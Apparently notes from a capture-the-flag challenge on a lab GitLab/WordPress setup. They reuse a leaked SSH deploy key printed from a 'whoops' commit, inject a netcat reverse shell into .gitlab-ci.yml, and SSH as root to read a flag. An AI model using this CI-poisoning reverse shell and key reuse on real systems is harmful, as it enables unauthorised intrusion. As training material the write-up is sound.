
Start with the information from the hints
Note it takes some time to spin up the servers

-------------------------------------
git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
cd wordpress.flag.net.internal

git log
git show e19f653bde9ea3de6af21a587e41e7a909db1ca5 

git config user.name git
git config --global --edit
## uncomment
## name = git
## email = git@grinchum-land.flag.net.internal   
        

git remote set-url origin git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git
git remote -v


tmux new 
<CTRL>+B % #split terminal & setup listener
nc -lvp 5000

<CTRL>+B o # change terminal panes

# create .ssh directory and a key pair

ssh-keygen -t ed25519

# Setup git for SSH
cat <<EOF > ~/.ssh/config 
Host gitlab.flag.net.internal
  HostName gitlab.flag.net.internal
  User git
  IdentityFile ~/key.txt
  IdentitiesOnly yes
EOF

# Use the info from the whoops commit to create private key for gitlab-runner

cat << EOF > ~/key.txt
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW   
QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5 
9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g 
AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot 
PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ== 
-----END OPENSSH PRIVATE KEY-----
EOF

chmod 0600 ~/key.txt

# get our IP

ip a

vi .gitlabci.yml
# add line
- nc 172.18.0.99 5000 -e /bin/sh

git commit -am listener
git push


# wait for nc, '<CTRL>+B o' to switch panes
# On gitlab-runner

ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy root@wordpress.flag.net.internal
sha256sum /flag.txt

Flag: oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT




commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 13:42:54 2022 -0700

commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 13:42:54 2022 -0700

    whoops

diff --git a/.ssh/.deploy b/.ssh/.deploy
deleted file mode 100644
index 3f7a9e3..0000000
--- a/.ssh/.deploy
+++ /dev/null
@@ -1,7 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
-QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
-9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
-AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
-PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
------END OPENSSH PRIVATE KEY-----
diff --git a/.ssh/.deploy.pub b/.ssh/.deploy.pub
deleted file mode 100644
index 8c0b43c..0000000
--- a/.ssh/.deploy.pub
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.com

    whoops








grinchum-land:~/wordpress.flag.net.internal$ cat .gitlab-ci.yml           │drwxr-xr-x   1 root     root     4096 Jan  4 23:00 etc
stages:                                                                   │-rwxr-xr-x   1 root     root        0 Jan  4 23:00 .dockerenv
  - deploy                                                                │drwxr-xr-x   1 root     root     4096 Jan  4 23:00 ..
                                                                          │drwxr-xr-x   1 root     root     4096 Jan  4 23:00 .
deploy-job:                                                               │dr-xr-xr-x  12 root     root        0 Jan  4 23:00 sys
  stage: deploy                                                           │dr-xr-xr-x 192 root     root        0 Jan  4 23:00 proc
  environment: production                                                 │drwxr-xr-x   5 root     root      340 Jan  4 23:00 dev
  script:                                                                 │drwxrwxrwt   1 root     root     4096 Jan  4 23:00 tmp
    - rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=│drwxr-xr-x   1 root     root     4096 Jan  4 23:19 run
www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.inte│sha256sum /flag.txt
rnal:/var/www/html                                                        │5168edbb08117e34cceb39087e874545fb4c0c7d700629b3aae939cb70a77ba5  /flag.t
    - nc 172.18.0.99 5000 -e /bin/sh                                      │xt
grinchum-land:~/wordpress.flag.net.internal$                







